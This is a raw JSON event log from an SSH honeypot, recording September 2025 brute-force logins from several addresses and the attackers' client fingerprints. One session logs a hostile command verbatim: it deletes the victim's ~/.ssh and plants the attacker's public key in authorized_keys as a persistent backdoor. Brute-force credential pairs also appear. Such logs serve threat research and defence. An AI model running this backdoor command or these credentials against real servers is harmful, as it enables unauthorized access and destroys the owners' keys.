{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:57:47.818471Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:47.819366Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":35498,"dst_ip":"1.2.3.4","dst_port":22,"session":"5729ed798748","protocol":"ssh","message":"New connection: 152.32.129.236:35498 (1.2.3.4:22) [session: 5729ed798748]","sensor":"my-vps","timestamp":"2025-09-09T00:57:48.019286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:48.019954Z","src_ip":"152.32.129.236","session":"5729ed798748"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:48.221564Z","src_ip":"152.32.129.236","session":"5729ed798748"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:57:49.067790Z","src_ip":"152.32.129.236","session":"5729ed798748"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:50.271355Z","src_ip":"152.32.129.236","session":"5729ed798748"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":35500,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2dc8b2f8602","protocol":"ssh","message":"New connection: 152.32.129.236:35500 (1.2.3.4:22) [session: f2dc8b2f8602]","sensor":"my-vps","timestamp":"2025-09-09T00:57:50.592753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:50.593614Z","src_ip":"152.32.129.236","session":"f2dc8b2f8602"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:50.857877Z","src_ip":"152.32.129.236","session":"f2dc8b2f8602"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:57:51.955015Z","src_ip":"152.32.129.236","session":"f2dc8b2f8602"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:52.161837Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:52.220223Z","src_ip":"152.32.129.236","session":"f2dc8b2f8602"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":44088,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8bb25334fc2","protocol":"ssh","message":"New connection: 103.100.209.195:44088 (1.2.3.4:22) [session: e8bb25334fc2]","sensor":"my-vps","timestamp":"2025-09-09T00:57:54.329949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:54.334571Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:54.532081Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.login.success","username":"root","password":"123ab456","message":"login attempt [root/123ab456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:57:55.318116Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:57:55.779594Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:57:55.780371Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:57:55.781332Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:55.985654Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:57:56.433322Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:57:56.434006Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:57:56.637556Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:56.638417Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":44503,"dst_ip":"1.2.3.4","dst_port":22,"session":"7091c7785406","protocol":"ssh","message":"New connection: 103.100.209.195:44503 (1.2.3.4:22) [session: 7091c7785406]","sensor":"my-vps","timestamp":"2025-09-09T00:57:56.850793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:56.860661Z","src_ip":"103.100.209.195","session":"7091c7785406"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:57.066622Z","src_ip":"103.100.209.195","session":"7091c7785406"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:57:57.902959Z","src_ip":"103.100.209.195","session":"7091c7785406"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:59.113805Z","src_ip":"103.100.209.195","session":"7091c7785406"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":45062,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b6d2060770b","protocol":"ssh","message":"New connection: 103.100.209.195:45062 (1.2.3.4:22) [session: 0b6d2060770b]","sensor":"my-vps","timestamp":"2025-09-09T00:57:59.303556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:59.309130Z","src_ip":"103.100.209.195","session":"0b6d2060770b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:59.506771Z","src_ip":"103.100.209.195","session":"0b6d2060770b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:58:00.301208Z","src_ip":"103.100.209.195","session":"0b6d2060770b"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:58:00.504543Z","src_ip":"103.100.209.195","session":"e8bb25334fc2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:58:00.505557Z","src_ip":"103.100.209.195","session":"0b6d2060770b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38126,"dst_ip":"1.2.3.4","dst_port":22,"session":"241f0f9e3260","protocol":"ssh","message":"New connection: 212.227.235.229:38126 (1.2.3.4:22) [session: 241f0f9e3260]","sensor":"my-vps","timestamp":"2025-09-09T00:58:15.449865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:58:15.450753Z","src_ip":"212.227.235.229","session":"241f0f9e3260"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T00:58:15.550138Z","src_ip":"212.227.235.229","session":"241f0f9e3260"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"c5:73:49:c8:cf:69:7a:19:a4:6b:e1:2c:4f:49:83:af","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCvRyDJhEOR9EQ+Kt+JLMGGM2a7+/AgVB2LwnwyBxWh5LYbWgd1f1YEMUWiRMcvPmaXt4gSrgtbVW/ca18fnvrh60apNGKEnWn7rKUjkjSgbSlWRJU3ikHlArO/FFSRCEUg4AMsjbnk3JojrUrN4SBNyEybmQOZJ+cdoasVwmjRVQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint c5:73:49:c8:cf:69:7a:19:a4:6b:e1:2c:4f:49:83:af","sensor":"my-vps","timestamp":"2025-09-09T00:58:15.751297Z","src_ip":"212.227.235.229","session":"241f0f9e3260"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"c5:73:49:c8:cf:69:7a:19:a4:6b:e1:2c:4f:49:83:af","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCvRyDJhEOR9EQ+Kt+JLMGGM2a7+/AgVB2LwnwyBxWh5LYbWgd1f1YEMUWiRMcvPmaXt4gSrgtbVW/ca18fnvrh60apNGKEnWn7rKUjkjSgbSlWRJU3ikHlArO/FFSRCEUg4AMsjbnk3JojrUrN4SBNyEybmQOZJ+cdoasVwmjRVQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T00:58:15.751887Z","src_ip":"212.227.235.229","session":"241f0f9e3260"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"c5:73:49:c8:cf:69:7a:19:a4:6b:e1:2c:4f:49:83:af","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCvRyDJhEOR9EQ+Kt+JLMGGM2a7+/AgVB2LwnwyBxWh5LYbWgd1f1YEMUWiRMcvPmaXt4gSrgtbVW/ca18fnvrh60apNGKEnWn7rKUjkjSgbSlWRJU3ikHlArO/FFSRCEUg4AMsjbnk3JojrUrN4SBNyEybmQOZJ+cdoasVwmjRVQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint c5:73:49:c8:cf:69:7a:19:a4:6b:e1:2c:4f:49:83:af","sensor":"my-vps","timestamp":"2025-09-09T00:58:15.852567Z","src_ip":"212.227.235.229","session":"241f0f9e3260"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"c5:73:49:c8:cf:69:7a:19:a4:6b:e1:2c:4f:49:83:af","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCvRyDJhEOR9EQ+Kt+JLMGGM2a7+/AgVB2LwnwyBxWh5LYbWgd1f1YEMUWiRMcvPmaXt4gSrgtbVW/ca18fnvrh60apNGKEnWn7rKUjkjSgbSlWRJU3ikHlArO/FFSRCEUg4AMsjbnk3JojrUrN4SBNyEybmQOZJ+cdoasVwmjRVQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T00:58:15.853447Z","src_ip":"212.227.235.229","session":"241f0f9e3260"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:58:25.450106Z","src_ip":"212.227.235.229","session":"241f0f9e3260"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":37524,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a0b06b9a1f8","protocol":"ssh","message":"New connection: 43.156.132.147:37524 (1.2.3.4:22) [session: 2a0b06b9a1f8]","sensor":"my-vps","timestamp":"2025-09-09T00:58:31.346750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:58:31.347575Z","src_ip":"43.156.132.147","session":"2a0b06b9a1f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:58:31.596606Z","src_ip":"43.156.132.147","session":"2a0b06b9a1f8"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom2025","message":"login attempt [tom/tom2025] failed","sensor":"my-vps","timestamp":"2025-09-09T00:58:32.594785Z","src_ip":"43.156.132.147","session":"2a0b06b9a1f8"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:58:33.847244Z","src_ip":"43.156.132.147","session":"2a0b06b9a1f8"}
